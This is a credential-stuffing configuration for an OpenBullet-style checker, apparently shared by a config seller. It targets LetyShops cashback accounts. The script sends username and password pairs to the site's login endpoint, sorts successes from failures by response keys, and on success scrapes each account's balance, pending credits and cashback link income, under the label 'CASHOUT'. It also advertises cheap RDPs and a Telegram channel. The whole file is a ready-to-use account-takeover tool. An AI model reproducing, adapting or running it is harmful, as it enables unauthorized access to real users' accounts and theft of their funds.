[SETTINGS]
{
  "Name": "LetyShops {CASHOUT}",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-10-04T00:27:56.0944058-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@MasterLordConfigs",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "IF You Want Buy RDPs At Cheapest Price > @MasterLord007",
      "VariableName": "",
      "Id": 921662786
    },
    {
      "Description": "Join > @MasterLordConfigs",
      "VariableName": "",
      "Id": 680464198
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "LetyShops {SHOPPING}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://letyshops.com/us/login" Multipart 
  
  STRINGCONTENT "_username: <USER>" 
  STRINGCONTENT "_password: <PASS>" 
  STRINGCONTENT "_csrf_token: " 
  STRINGCONTENT "recaptcha_params: " 
  STRINGCONTENT "destination: /user" 
  BOUNDARY "----WebKitFormBoundaryVQs6YN4LoqcgoU4U" 
  HEADER "Host: letyshops.com" 
  HEADER "Origin: https://letyshops.com" 
  HEADER "Referer: https://letyshops.com/us" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"94\", \"Microsoft Edge\";v=\"94\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "traceparent: 00-ae83d7c94ba99c10f126d9196cf87b26-b8b9cf6eeed203fa-01" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Edg/94.0.992.38" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVQs6YN4LoqcgoU4U" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Unable to login. Confirm that the email and password have been entered correctly." 
    KEY "Validation exception" 
    KEY "Enter your email" 
    KEY "validationReason" 
  KEYCHAIN Success OR 
    KEY "location\":\"https:\\/\\/letyshops.com\\/user" 

#GET_BALANCE_CAP REQUEST GET "https://letyshops.com/us/user/balance" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#BALANCE PARSE "<SOURCE>" LR "<div class=\"text-xl font-bold mt-2\">" "</div>" CreateEmpty=FALSE -> CAP "Balance" 

#PENDING_CREDITS PARSE "<SOURCE>" LR "<div class=\"text-xl font-bold mt-2 text-gray-700\">" "</div>" CreateEmpty=FALSE -> CAP "Pending Credits" 

#GET_LINKS_CAP REQUEST GET "https://letyshops.com/us/cashbacklink" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CASHBACK_LINKS PARSE "<SOURCE>" LR "<div class=\"partner-statistics__number\">" "</div>" CreateEmpty=FALSE -> CAP "Cashback Links" 

#INCOME_FROM_LINKS PARSE "<SOURCE>" LR "<span class=\"partner-statistics__number\">" "</span>" CreateEmpty=FALSE -> CAP "Income From Links" 

#CREATOR FUNCTION Constant "@MasterLordConfigs" -> CAP "Config By" 

